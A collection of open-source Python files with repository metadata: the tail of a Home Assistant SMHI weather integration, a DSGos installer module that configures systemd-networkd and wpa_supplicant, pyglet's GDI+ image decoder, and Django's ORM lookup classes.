"""Return a unique id."""
return f"{self._latitude}, {self._longitude}"
@Throttle(MIN_TIME_BETWEEN_UPDATES)
async def async_update(self) -> None:
"""Refresh the forecast data from SMHI weather API."""
try:
with async_timeout.timeout(10):
self._forecasts = await self.get_weather_forecast()
self._fail_count = 0
except (asyncio.TimeoutError, SmhiForecastException):
_LOGGER.error("Failed to connect to SMHI API, retry in 5 minutes")
self._fail_count += 1
if self._fail_count < 3:
self.hass.helpers.event.async_call_later(
RETRY_TIMEOUT, self.retry_update
)
async def retry_update(self, _):
"""Retry refresh weather forecast."""
await self.async_update()
async def get_weather_forecast(self) -> []:
"""Return the current forecasts from SMHI API."""
return await self._smhi_api.async_get_forecast()
@property
def name(self) -> str:
"""Return the name of the sensor."""
return self._name
@property
def temperature(self) -> int:
"""Return the temperature."""
if self._forecasts is not None:
return self._forecasts[0].temperature
return None
@property
def temperature_unit(self) -> str:
"""Return the unit of measurement."""
return TEMP_CELSIUS
@property
def humidity(self) -> int:
"""Return the humidity."""
if self._forecasts is not None:
return self._forecasts[0].humidity
return None
@property
def wind_speed(self) -> float:
"""Return the wind speed."""
if self._forecasts is not None:
# Convert from m/s to km/h
return round(self._forecasts[0].wind_speed * 18 / 5)
return None
@property
def wind_bearing(self) -> int:
"""Return the wind bearing."""
if self._forecasts is not None:
return self._forecasts[0].wind_direction
return None
@property
def visibility(self) -> float:
"""Return the visibility."""
if self._forecasts is not None:
return self._forecasts[0].horizontal_visibility
return None
@property
def pressure(self) -> int:
"""Return the pressure."""
if self._forecasts is not None:
return self._forecasts[0].pressure
return None
@property
def cloudiness(self) -> int:
"""Return the cloudiness."""
if self._forecasts is not None:
return self._forecasts[0].cloudiness
return None
@property
def condition(self) -> str:
"""Return the weather condition."""
if self._forecasts is None:
return None
return next(
(k for k, v in CONDITION_CLASSES.items() if self._forecasts[0].symbol in v),
None,
)
@property
def attribution(self) -> str:
"""Return the attribution."""
return "Swedish weather institute (SMHI)"
@property
def forecast(self) -> List:
"""Return the forecast."""
if self._forecasts is None or len(self._forecasts) < 2:
return None
data = []
for forecast in self._forecasts[1:]:
condition = next(
(k for k, v in CONDITION_CLASSES.items() if forecast.symbol in v), None
)
data.append(
{
ATTR_FORECAST_TIME: forecast.valid_time.isoformat(),
ATTR_FORECAST_TEMP: forecast.temperature_max,
ATTR_FORECAST_TEMP_LOW: forecast.temperature_min,
ATTR_FORECAST_PRECIPITATION: round(forecast.total_precipitation, 1),
ATTR_FORECAST_CONDITION: condition,
}
)
return data
@property
def device_state_attributes(self) -> Dict:
"""Return SMHI specific attributes."""
if self.cloudiness:
return {ATTR_SMHI_CLOUDINESS: self.cloudiness}
|
apache-2.0
|
DecisionSystemsGroup/DSGos
|
airootfs/usr/share/DSGos-Installer/DSGos_Installer/installation/systemd_networkd.py
|
2
|
4641
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# systemd_networkd.py
#
# Copyright ยฉ 2013-2015 DSGos
#
# This file is part of DSGos_Installer.
#
# DSGos_Installer is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 3 of the License, or
# (at your option) any later version.
#
# DSGos_Installer is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# The following additional terms are in effect as per Section 7 of the license:
#
# The preservation of all legal notices and author attributions in
# the material or in the Appropriate Legal Notices displayed
# by works containing it is required.
#
# You should have received a copy of the GNU General Public License
# along with DSGos_Installer; If not, see <http://www.gnu.org/licenses/>.
""" systemd-networkd configuration in base install. """
# https://wiki.archlinux.org/index.php/Systemd-networkd
# TODO: Setup wireless interfaces
# https://wiki.archlinux.org/index.php/WPA_supplicant
import os
import subprocess
import logging
from installation import chroot
DEST_DIR = "/install"
def chroot_run(cmd):
chroot.run(cmd, DEST_DIR)
def setup(ssid=None, passphrase=None):
""" Configure system-networkd for base installs """
# For compatibility with resolv.conf, delete the existing file and
# create the following symbolic link:
source = os.path.join("/run/systemd/resolve/resolv.conf")
link_name = os.path.join(DEST_DIR, "etc/resolv.conf")
# Delete /etc/resolv.conf if it already exists
if os.path.exists(link_name):
os.unlink(link_name)
# Creates the symlink
try:
os.symlink(source, link_name)
except OSError as os_error:
logging.warning(os_error)
# Get interface names (links)
links = []
links_wireless = []
try:
cmd = ['networkctl', 'list']
output = subprocess.check_output(cmd).decode().split('\n')
for line in output:
fields = line.split()
if len(fields) > 0:
link = fields[1]
if link.startswith("eth") or link.startswith("enp"):
links.append(link)
elif link.startswith("wlp"):
links.append(link)
links_wireless.append(link)
except subprocess.CalledProcessError as process_error:
logging.warning("systemd-networkd configuration failed: %s", process_error)
return
logging.debug("Found [%s] links and [%s] are wireless", " ".join(links), " ".join(links_wireless))
# Setup DHCP by default for all interfaces found
for link in links:
fname = "etc/systemd/network/{0}.network".format(link)
wired_path = os.path.join(DEST_DIR, fname)
with open(wired_path, 'w') as wired_file:
wired_file.write("# {0} adapter using DHCP (written by DSGos_Installer)\n".format(link))
wired_file.write("[Match]\n")
wired_file.write("Name={0}\n\n".format(link))
wired_file.write("[Network]\n")
wired_file.write("DHCP=ipv4\n")
logging.debug("Created %s configuration file", wired_path)
# One needs to have configured a wireless adapter with another service
# such as wpa_supplicant and the corresponding service is required to be enabled.
# /etc/wpa_supplicant/wpa_supplicant-interface.conf.
# systemctl enable wpa_supplicant@interface
# Setup wpa_supplicant. We need the SID and the passphrase
# TODO: Ask for different sid's or passphrases for each interface
if ssid is not None and passphrase is not None:
for link in links_wireless:
conf_path = os.path.join(
DEST_DIR,
"etc/wpa_supplicant/wpa_supplicant-{0}.conf".format(link))
try:
conf = subprocess.check_output(["wpa_passphrase", ssid, passphrase])
with open(conf_path, "w") as conf_file:
conf_file.write(conf)
except subprocess.CalledProcessError as process_error:
logging.warning(process_error)
cmd = ["systemctl", "enable", "wpa_supplicant@{0}".format(link)]
chroot_run(cmd)
# cmd = ["systemctl", "enable", "dhcpcd@{0}".format(link)]
# chroot_run(cmd)
if __name__ == '__main__':
def _(x): return x
DEST_DIR="/"
setup()
|
mit
|
google-code-export/pyglet
|
pyglet/image/codecs/gdiplus.py
|
28
|
12535
|
# ----------------------------------------------------------------------------
# pyglet
# Copyright (c) 2006-2008 Alex Holkner
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions
# are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of pyglet nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
'''
'''
__docformat__ = 'restructuredtext'
__version__ = '$Id: pil.py 163 2006-11-13 04:15:46Z Alex.Holkner $'
from ctypes import *
from pyglet.com import IUnknown
from pyglet.gl import *
from pyglet.image import *
from pyglet.image.codecs import *
from pyglet.libs.win32.constants import *
from pyglet.libs.win32.types import *
from pyglet.libs.win32 import _kernel32 as kernel32
ole32 = windll.ole32
gdiplus = windll.gdiplus
LPSTREAM = c_void_p
REAL = c_float
PixelFormat1bppIndexed = 196865
PixelFormat4bppIndexed = 197634
PixelFormat8bppIndexed = 198659
PixelFormat16bppGrayScale = 1052676
PixelFormat16bppRGB555 = 135173
PixelFormat16bppRGB565 = 135174
PixelFormat16bppARGB1555 = 397319
PixelFormat24bppRGB = 137224
PixelFormat32bppRGB = 139273
PixelFormat32bppARGB = 2498570
PixelFormat32bppPARGB = 925707
PixelFormat48bppRGB = 1060876
PixelFormat64bppARGB = 3424269
PixelFormat64bppPARGB = 29622286
PixelFormatMax = 15
ImageLockModeRead = 1
ImageLockModeWrite = 2
ImageLockModeUserInputBuf = 4
class GdiplusStartupInput(Structure):
_fields_ = [
('GdiplusVersion', c_uint32),
('DebugEventCallback', c_void_p),
('SuppressBackgroundThread', BOOL),
('SuppressExternalCodecs', BOOL)
]
class GdiplusStartupOutput(Structure):
_fields = [
('NotificationHookProc', c_void_p),
('NotificationUnhookProc', c_void_p)
]
class BitmapData(Structure):
_fields_ = [
('Width', c_uint),
('Height', c_uint),
('Stride', c_int),
('PixelFormat', c_int),
('Scan0', POINTER(c_byte)),
('Reserved', POINTER(c_uint))
]
class Rect(Structure):
_fields_ = [
('X', c_int),
('Y', c_int),
('Width', c_int),
('Height', c_int)
]
PropertyTagFrameDelay = 0x5100
class PropertyItem(Structure):
_fields_ = [
('id', c_uint),
('length', c_ulong),
('type', c_short),
('value', c_void_p)
]
INT_PTR = POINTER(INT)
UINT_PTR = POINTER(UINT)
ole32.CreateStreamOnHGlobal.argtypes = [HGLOBAL, BOOL, LPSTREAM]
gdiplus.GdipBitmapLockBits.restype = c_int
gdiplus.GdipBitmapLockBits.argtypes = [c_void_p, c_void_p, UINT, c_int, c_void_p]
gdiplus.GdipBitmapUnlockBits.restype = c_int
gdiplus.GdipBitmapUnlockBits.argtypes = [c_void_p, c_void_p]
gdiplus.GdipCloneStringFormat.restype = c_int
gdiplus.GdipCloneStringFormat.argtypes = [c_void_p, c_void_p]
gdiplus.GdipCreateBitmapFromScan0.restype = c_int
gdiplus.GdipCreateBitmapFromScan0.argtypes = [c_int, c_int, c_int, c_int, POINTER(BYTE), c_void_p]
gdiplus.GdipCreateBitmapFromStream.restype = c_int
gdiplus.GdipCreateBitmapFromStream.argtypes = [c_void_p, c_void_p]
gdiplus.GdipCreateFont.restype = c_int
gdiplus.GdipCreateFont.argtypes = [c_void_p, REAL, INT, c_int, c_void_p]
gdiplus.GdipCreateFontFamilyFromName.restype = c_int
gdiplus.GdipCreateFontFamilyFromName.argtypes = [c_wchar_p, c_void_p, c_void_p]
gdiplus.GdipCreateMatrix.restype = None
gdiplus.GdipCreateMatrix.argtypes = [c_void_p]
gdiplus.GdipCreateSolidFill.restype = c_int
gdiplus.GdipCreateSolidFill.argtypes = [c_int, c_void_p] # ARGB
gdiplus.GdipDisposeImage.restype = c_int
gdiplus.GdipDisposeImage.argtypes = [c_void_p]
gdiplus.GdipDrawString.restype = c_int
gdiplus.GdipDrawString.argtypes = [c_void_p, c_wchar_p, c_int, c_void_p, c_void_p, c_void_p, c_void_p]
gdiplus.GdipFlush.restype = c_int
gdiplus.GdipFlush.argtypes = [c_void_p, c_int]
gdiplus.GdipGetImageDimension.restype = c_int
gdiplus.GdipGetImageDimension.argtypes = [c_void_p, POINTER(REAL), POINTER(REAL)]
gdiplus.GdipGetImageGraphicsContext.restype = c_int
gdiplus.GdipGetImageGraphicsContext.argtypes = [c_void_p, c_void_p]
gdiplus.GdipGetImagePixelFormat.restype = c_int
gdiplus.GdipGetImagePixelFormat.argtypes = [c_void_p, c_void_p]
gdiplus.GdipGetPropertyItem.restype = c_int
gdiplus.GdipGetPropertyItem.argtypes = [c_void_p, c_uint, c_uint, c_void_p]
gdiplus.GdipGetPropertyItemSize.restype = c_int
gdiplus.GdipGetPropertyItemSize.argtypes = [c_void_p, c_uint, UINT_PTR]
gdiplus.GdipGraphicsClear.restype = c_int
gdiplus.GdipGraphicsClear.argtypes = [c_void_p, c_int] # ARGB
gdiplus.GdipImageGetFrameCount.restype = c_int
gdiplus.GdipImageGetFrameCount.argtypes = [c_void_p, c_void_p, UINT_PTR]
gdiplus.GdipImageGetFrameDimensionsCount.restype = c_int
gdiplus.GdipImageGetFrameDimensionsCount.argtypes = [c_void_p, UINT_PTR]
gdiplus.GdipImageGetFrameDimensionsList.restype = c_int
gdiplus.GdipImageGetFrameDimensionsList.argtypes = [c_void_p, c_void_p, UINT]
gdiplus.GdipImageSelectActiveFrame.restype = c_int
gdiplus.GdipImageSelectActiveFrame.argtypes = [c_void_p, c_void_p, UINT]
gdiplus.GdipMeasureString.restype = c_int
gdiplus.GdipMeasureString.argtypes = [c_void_p, c_wchar_p, c_int, c_void_p, c_void_p, c_void_p, c_void_p, INT_PTR, INT_PTR]
gdiplus.GdipNewPrivateFontCollection.restype = c_int
gdiplus.GdipNewPrivateFontCollection.argtypes = [c_void_p]
gdiplus.GdipPrivateAddMemoryFont.restype = c_int
gdiplus.GdipPrivateAddMemoryFont.argtypes = [c_void_p, c_void_p, c_int]
gdiplus.GdipSetPageUnit.restype = c_int
gdiplus.GdipSetPageUnit.argtypes = [c_void_p, c_int]
gdiplus.GdipSetStringFormatFlags.restype = c_int
gdiplus.GdipSetStringFormatFlags.argtypes = [c_void_p, c_int]
gdiplus.GdipSetTextRenderingHint.restype = c_int
gdiplus.GdipSetTextRenderingHint.argtypes = [c_void_p, c_int]
gdiplus.GdipStringFormatGetGenericTypographic.restype = c_int
gdiplus.GdipStringFormatGetGenericTypographic.argtypes = [c_void_p]
gdiplus.GdiplusShutdown.restype = None
gdiplus.GdiplusShutdown.argtypes = [POINTER(ULONG)]
gdiplus.GdiplusStartup.restype = c_int
gdiplus.GdiplusStartup.argtypes = [c_void_p, c_void_p, c_void_p]
class GDIPlusDecoder(ImageDecoder):
def get_file_extensions(self):
return ['.bmp', '.gif', '.jpg', '.jpeg', '.exif', '.png', '.tif',
'.tiff']
def get_animation_file_extensions(self):
# TIFF also supported as a multi-page image; but that's not really an
# animation, is it?
return ['.gif']
def _load_bitmap(self, file, filename):
data = file.read()
# Create a HGLOBAL with image data
hglob = kernel32.GlobalAlloc(GMEM_MOVEABLE, len(data))
ptr = kernel32.GlobalLock(hglob)
memmove(ptr, data, len(data))
kernel32.GlobalUnlock(hglob)
# Create IStream for the HGLOBAL
self.stream = IUnknown()
ole32.CreateStreamOnHGlobal(hglob, True, byref(self.stream))
# Load image from stream
bitmap = c_void_p()
status = gdiplus.GdipCreateBitmapFromStream(self.stream, byref(bitmap))
if status != 0:
self.stream.Release()
raise ImageDecodeException(
'GDI+ cannot load %r' % (filename or file))
return bitmap
def _get_image(self, bitmap):
# Get size of image (Bitmap subclasses Image)
width = REAL()
height = REAL()
gdiplus.GdipGetImageDimension(bitmap, byref(width), byref(height))
width = int(width.value)
height = int(height.value)
# Get image pixel format
pf = c_int()
gdiplus.GdipGetImagePixelFormat(bitmap, byref(pf))
pf = pf.value
# Reverse from what's documented because of Intel little-endianness.
format = 'BGRA'
if pf == PixelFormat24bppRGB:
format = 'BGR'
elif pf == PixelFormat32bppRGB:
pass
elif pf == PixelFormat32bppARGB:
pass
elif pf in (PixelFormat16bppARGB1555, PixelFormat32bppPARGB,
PixelFormat64bppARGB, PixelFormat64bppPARGB):
pf = PixelFormat32bppARGB
else:
format = 'BGR'
pf = PixelFormat24bppRGB
# Lock pixel data in best format
rect = Rect()
rect.X = 0
rect.Y = 0
rect.Width = width
rect.Height = height
bitmap_data = BitmapData()
gdiplus.GdipBitmapLockBits(bitmap,
byref(rect), ImageLockModeRead, pf, byref(bitmap_data))
# Create buffer for RawImage
buffer = create_string_buffer(bitmap_data.Stride * height)
memmove(buffer, bitmap_data.Scan0, len(buffer))
# Unlock data
gdiplus.GdipBitmapUnlockBits(bitmap, byref(bitmap_data))
return ImageData(width, height, format, buffer, -bitmap_data.Stride)
def _delete_bitmap(self, bitmap):
# Release image and stream
gdiplus.GdipDisposeImage(bitmap)
self.stream.Release()
def decode(self, file, filename):
bitmap = self._load_bitmap(file, filename)
image = self._get_image(bitmap)
self._delete_bitmap(bitmap)
return image
def decode_animation(self, file, filename):
bitmap = self._load_bitmap(file, filename)
dimension_count = c_uint()
gdiplus.GdipImageGetFrameDimensionsCount(bitmap, byref(dimension_count))
if dimension_count.value < 1:
self._delete_bitmap(bitmap)
raise ImageDecodeException('Image has no frame dimensions')
# XXX Make sure this dimension is time?
dimensions = (c_void_p * dimension_count.value)()
gdiplus.GdipImageGetFrameDimensionsList(bitmap, dimensions,
dimension_count.value)
frame_count = c_uint()
gdiplus.GdipImageGetFrameCount(bitmap, dimensions, byref(frame_count))
prop_id = PropertyTagFrameDelay
prop_size = c_uint()
gdiplus.GdipGetPropertyItemSize(bitmap, prop_id, byref(prop_size))
prop_buffer = c_buffer(prop_size.value)
prop_item = cast(prop_buffer, POINTER(PropertyItem)).contents
gdiplus.GdipGetPropertyItem(bitmap, prop_id, prop_size.value,
prop_buffer)
n_delays = prop_item.length // sizeof(c_long)
delays = cast(prop_item.value, POINTER(c_long * n_delays)).contents
frames = []
for i in range(frame_count.value):
gdiplus.GdipImageSelectActiveFrame(bitmap, dimensions, i)
image = self._get_image(bitmap)
delay = delays[i]
if delay <= 1:
delay = 10
frames.append(AnimationFrame(image, delay/100.))
self._delete_bitmap(bitmap)
return Animation(frames)
def get_decoders():
return [GDIPlusDecoder()]
def get_encoders():
return []
def init():
token = c_ulong()
startup_in = GdiplusStartupInput()
startup_in.GdiplusVersion = 1
startup_out = GdiplusStartupOutput()
gdiplus.GdiplusStartup(byref(token), byref(startup_in), byref(startup_out))
# Shutdown later?
# gdiplus.GdiplusShutdown(token)
init()
|
bsd-3-clause
|
aidanlister/django
|
django/db/models/lookups.py
|
194
|
16328
|
import inspect
from copy import copy
from django.utils.functional import cached_property
from django.utils.six.moves import range
from .query_utils import QueryWrapper
class RegisterLookupMixin(object):
def _get_lookup(self, lookup_name):
try:
return self.class_lookups[lookup_name]
except KeyError:
# To allow for inheritance, check parent class' class_lookups.
for parent in inspect.getmro(self.__class__):
if 'class_lookups' not in parent.__dict__:
continue
if lookup_name in parent.class_lookups:
return parent.class_lookups[lookup_name]
except AttributeError:
# This class didn't have any class_lookups
pass
return None
def get_lookup(self, lookup_name):
found = self._get_lookup(lookup_name)
if found is None and hasattr(self, 'output_field'):
return self.output_field.get_lookup(lookup_name)
if found is not None and not issubclass(found, Lookup):
return None
return found
def get_transform(self, lookup_name):
found = self._get_lookup(lookup_name)
if found is None and hasattr(self, 'output_field'):
return self.output_field.get_transform(lookup_name)
if found is not None and not issubclass(found, Transform):
return None
return found
@classmethod
def register_lookup(cls, lookup):
if 'class_lookups' not in cls.__dict__:
cls.class_lookups = {}
cls.class_lookups[lookup.lookup_name] = lookup
return lookup
@classmethod
def _unregister_lookup(cls, lookup):
"""
Removes given lookup from cls lookups. Meant to be used in
tests only.
"""
del cls.class_lookups[lookup.lookup_name]
class Transform(RegisterLookupMixin):
bilateral = False
def __init__(self, lhs, lookups):
self.lhs = lhs
self.init_lookups = lookups[:]
def as_sql(self, compiler, connection):
raise NotImplementedError
@cached_property
def output_field(self):
return self.lhs.output_field
def copy(self):
return copy(self)
def relabeled_clone(self, relabels):
copy = self.copy()
copy.lhs = self.lhs.relabeled_clone(relabels)
return copy
def get_group_by_cols(self):
return self.lhs.get_group_by_cols()
def get_bilateral_transforms(self):
if hasattr(self.lhs, 'get_bilateral_transforms'):
bilateral_transforms = self.lhs.get_bilateral_transforms()
else:
bilateral_transforms = []
if self.bilateral:
bilateral_transforms.append((self.__class__, self.init_lookups))
return bilateral_transforms
@cached_property
def contains_aggregate(self):
return self.lhs.contains_aggregate
class Lookup(RegisterLookupMixin):
lookup_name = None
def __init__(self, lhs, rhs):
self.lhs, self.rhs = lhs, rhs
self.rhs = self.get_prep_lookup()
if hasattr(self.lhs, 'get_bilateral_transforms'):
bilateral_transforms = self.lhs.get_bilateral_transforms()
else:
bilateral_transforms = []
if bilateral_transforms:
# We should warn the user as soon as possible if he is trying to apply
# a bilateral transformation on a nested QuerySet: that won't work.
# We need to import QuerySet here so as to avoid circular
from django.db.models.query import QuerySet
if isinstance(rhs, QuerySet):
raise NotImplementedError("Bilateral transformations on nested querysets are not supported.")
self.bilateral_transforms = bilateral_transforms
def apply_bilateral_transforms(self, value):
for transform, lookups in self.bilateral_transforms:
value = transform(value, lookups)
return value
def batch_process_rhs(self, compiler, connection, rhs=None):
if rhs is None:
rhs = self.rhs
if self.bilateral_transforms:
sqls, sqls_params = [], []
for p in rhs:
value = QueryWrapper('%s',
[self.lhs.output_field.get_db_prep_value(p, connection)])
value = self.apply_bilateral_transforms(value)
sql, sql_params = compiler.compile(value)
sqls.append(sql)
sqls_params.extend(sql_params)
else:
params = self.lhs.output_field.get_db_prep_lookup(
self.lookup_name, rhs, connection, prepared=True)
sqls, sqls_params = ['%s'] * len(params), params
return sqls, sqls_params
def get_prep_lookup(self):
return self.lhs.output_field.get_prep_lookup(self.lookup_name, self.rhs)
def get_db_prep_lookup(self, value, connection):
return (
'%s', self.lhs.output_field.get_db_prep_lookup(
self.lookup_name, value, connection, prepared=True))
def process_lhs(self, compiler, connection, lhs=None):
lhs = lhs or self.lhs
return compiler.compile(lhs)
def process_rhs(self, compiler, connection):
value = self.rhs
if self.bilateral_transforms:
if self.rhs_is_direct_value():
# Do not call get_db_prep_lookup here as the value will be
# transformed before being used for lookup
value = QueryWrapper("%s",
[self.lhs.output_field.get_db_prep_value(value, connection)])
value = self.apply_bilateral_transforms(value)
# Due to historical reasons there are a couple of different
# ways to produce sql here. get_compiler is likely a Query
# instance, _as_sql QuerySet and as_sql just something with
# as_sql. Finally the value can of course be just plain
# Python value.
if hasattr(value, 'get_compiler'):
value = value.get_compiler(connection=connection)
if hasattr(value, 'as_sql'):
sql, params = compiler.compile(value)
return '(' + sql + ')', params
if hasattr(value, '_as_sql'):
sql, params = value._as_sql(connection=connection)
return '(' + sql + ')', params
else:
return self.get_db_prep_lookup(value, connection)
def rhs_is_direct_value(self):
return not(
hasattr(self.rhs, 'as_sql') or
hasattr(self.rhs, '_as_sql') or
hasattr(self.rhs, 'get_compiler'))
def relabeled_clone(self, relabels):
new = copy(self)
new.lhs = new.lhs.relabeled_clone(relabels)
if hasattr(new.rhs, 'relabeled_clone'):
new.rhs = new.rhs.relabeled_clone(relabels)
return new
def get_group_by_cols(self):
cols = self.lhs.get_group_by_cols()
if hasattr(self.rhs, 'get_group_by_cols'):
cols.extend(self.rhs.get_group_by_cols())
return cols
def as_sql(self, compiler, connection):
raise NotImplementedError
@cached_property
def contains_aggregate(self):
return self.lhs.contains_aggregate or getattr(self.rhs, 'contains_aggregate', False)
class BuiltinLookup(Lookup):
def process_lhs(self, compiler, connection, lhs=None):
lhs_sql, params = super(BuiltinLookup, self).process_lhs(
compiler, connection, lhs)
field_internal_type = self.lhs.output_field.get_internal_type()
db_type = self.lhs.output_field.db_type(connection=connection)
lhs_sql = connection.ops.field_cast_sql(
db_type, field_internal_type) % lhs_sql
lhs_sql = connection.ops.lookup_cast(self.lookup_name, field_internal_type) % lhs_sql
return lhs_sql, params
def as_sql(self, compiler, connection):
lhs_sql, params = self.process_lhs(compiler, connection)
rhs_sql, rhs_params = self.process_rhs(compiler, connection)
params.extend(rhs_params)
rhs_sql = self.get_rhs_op(connection, rhs_sql)
return '%s %s' % (lhs_sql, rhs_sql), params
def get_rhs_op(self, connection, rhs):
return connection.operators[self.lookup_name] % rhs
default_lookups = {}
class Exact(BuiltinLookup):
lookup_name = 'exact'
default_lookups['exact'] = Exact
class IExact(BuiltinLookup):
lookup_name = 'iexact'
def process_rhs(self, qn, connection):
rhs, params = super(IExact, self).process_rhs(qn, connection)
if params:
params[0] = connection.ops.prep_for_iexact_query(params[0])
return rhs, params
default_lookups['iexact'] = IExact
class GreaterThan(BuiltinLookup):
lookup_name = 'gt'
default_lookups['gt'] = GreaterThan
class GreaterThanOrEqual(BuiltinLookup):
lookup_name = 'gte'
default_lookups['gte'] = GreaterThanOrEqual
class LessThan(BuiltinLookup):
lookup_name = 'lt'
default_lookups['lt'] = LessThan
class LessThanOrEqual(BuiltinLookup):
lookup_name = 'lte'
default_lookups['lte'] = LessThanOrEqual
class In(BuiltinLookup):
lookup_name = 'in'
def process_rhs(self, compiler, connection):
if self.rhs_is_direct_value():
# rhs should be an iterable, we use batch_process_rhs
# to prepare/transform those values
rhs = list(self.rhs)
if not rhs:
from django.db.models.sql.datastructures import EmptyResultSet
raise EmptyResultSet
sqls, sqls_params = self.batch_process_rhs(compiler, connection, rhs)
placeholder = '(' + ', '.join(sqls) + ')'
return (placeholder, sqls_params)
else:
return super(In, self).process_rhs(compiler, connection)
def get_rhs_op(self, connection, rhs):
return 'IN %s' % rhs
def as_sql(self, compiler, connection):
max_in_list_size = connection.ops.max_in_list_size()
if self.rhs_is_direct_value() and (max_in_list_size and
len(self.rhs) > max_in_list_size):
# This is a special case for Oracle which limits the number of elements
# which can appear in an 'IN' clause.
lhs, lhs_params = self.process_lhs(compiler, connection)
rhs, rhs_params = self.batch_process_rhs(compiler, connection)
in_clause_elements = ['(']
params = []
for offset in range(0, len(rhs_params), max_in_list_size):
if offset > 0:
in_clause_elements.append(' OR ')
in_clause_elements.append('%s IN (' % lhs)
params.extend(lhs_params)
sqls = rhs[offset: offset + max_in_list_size]
sqls_params = rhs_params[offset: offset + max_in_list_size]
param_group = ', '.join(sqls)
in_clause_elements.append(param_group)
in_clause_elements.append(')')
params.extend(sqls_params)
in_clause_elements.append(')')
return ''.join(in_clause_elements), params
else:
return super(In, self).as_sql(compiler, connection)
default_lookups['in'] = In
class PatternLookup(BuiltinLookup):
def get_rhs_op(self, connection, rhs):
# Assume we are in startswith. We need to produce SQL like:
# col LIKE %s, ['thevalue%']
# For python values we can (and should) do that directly in Python,
# but if the value is for example reference to other column, then
# we need to add the % pattern match to the lookup by something like
# col LIKE othercol || '%%'
# So, for Python values we don't need any special pattern, but for
# SQL reference values or SQL transformations we need the correct
# pattern added.
if (hasattr(self.rhs, 'get_compiler') or hasattr(self.rhs, 'as_sql')
or hasattr(self.rhs, '_as_sql') or self.bilateral_transforms):
pattern = connection.pattern_ops[self.lookup_name].format(connection.pattern_esc)
return pattern.format(rhs)
else:
return super(PatternLookup, self).get_rhs_op(connection, rhs)
class Contains(PatternLookup):
lookup_name = 'contains'
def process_rhs(self, qn, connection):
rhs, params = super(Contains, self).process_rhs(qn, connection)
if params and not self.bilateral_transforms:
params[0] = "%%%s%%" % connection.ops.prep_for_like_query(params[0])
return rhs, params
default_lookups['contains'] = Contains
class IContains(Contains):
lookup_name = 'icontains'
default_lookups['icontains'] = IContains
class StartsWith(PatternLookup):
lookup_name = 'startswith'
def process_rhs(self, qn, connection):
rhs, params = super(StartsWith, self).process_rhs(qn, connection)
if params and not self.bilateral_transforms:
params[0] = "%s%%" % connection.ops.prep_for_like_query(params[0])
return rhs, params
default_lookups['startswith'] = StartsWith
class IStartsWith(PatternLookup):
lookup_name = 'istartswith'
def process_rhs(self, qn, connection):
rhs, params = super(IStartsWith, self).process_rhs(qn, connection)
if params and not self.bilateral_transforms:
params[0] = "%s%%" % connection.ops.prep_for_like_query(params[0])
return rhs, params
default_lookups['istartswith'] = IStartsWith
class EndsWith(PatternLookup):
lookup_name = 'endswith'
def process_rhs(self, qn, connection):
rhs, params = super(EndsWith, self).process_rhs(qn, connection)
if params and not self.bilateral_transforms:
params[0] = "%%%s" % connection.ops.prep_for_like_query(params[0])
return rhs, params
default_lookups['endswith'] = EndsWith
class IEndsWith(PatternLookup):
lookup_name = 'iendswith'
def process_rhs(self, qn, connection):
rhs, params = super(IEndsWith, self).process_rhs(qn, connection)
if params and not self.bilateral_transforms:
params[0] = "%%%s" % connection.ops.prep_for_like_query(params[0])
return rhs, params
default_lookups['iendswith'] = IEndsWith
class Between(BuiltinLookup):
def get_rhs_op(self, connection, rhs):
return "BETWEEN %s AND %s" % (rhs, rhs)
class Range(BuiltinLookup):
lookup_name = 'range'
def get_rhs_op(self, connection, rhs):
return "BETWEEN %s AND %s" % (rhs[0], rhs[1])
def process_rhs(self, compiler, connection):
if self.rhs_is_direct_value():
# rhs should be an iterable of 2 values, we use batch_process_rhs
# to prepare/transform those values
return self.batch_process_rhs(compiler, connection)
else:
return super(Range, self).process_rhs(compiler, connection)
default_lookups['range'] = Range
class IsNull(BuiltinLookup):
lookup_name = 'isnull'
def as_sql(self, compiler, connection):
sql, params = compiler.compile(self.lhs)
if self.rhs:
return "%s IS NULL" % sql, params
else:
return "%s IS NOT NULL" % sql, params
default_lookups['isnull'] = IsNull
class Search(BuiltinLookup):
lookup_name = 'search'
def as_sql(self, compiler, connection):
lhs, lhs_params = self.process_lhs(compiler, connection)
rhs, rhs_params = self.process_rhs(compiler, connection)
sql_template = connection.ops.fulltext_search_sql(field_name=lhs)
return sql_template, lhs_params + rhs_params
default_lookups['search'] = Search
class Regex(BuiltinLookup):
lookup_name = 'regex'
def as_sql(self, compiler, connection):
if self.lookup_name in connection.operators:
return super(Regex, self).as_sql(compiler, connection)
else:
lhs, lhs_params = self.process_lhs(compiler, connection)
rhs, rhs_params = self.process_rhs(compiler, connection)
sql_template = connection.ops.regex_lookup(self.lookup_name)
return sql_template % (lhs, rhs), lhs_params + rhs_params
default_lookups['regex'] = Regex
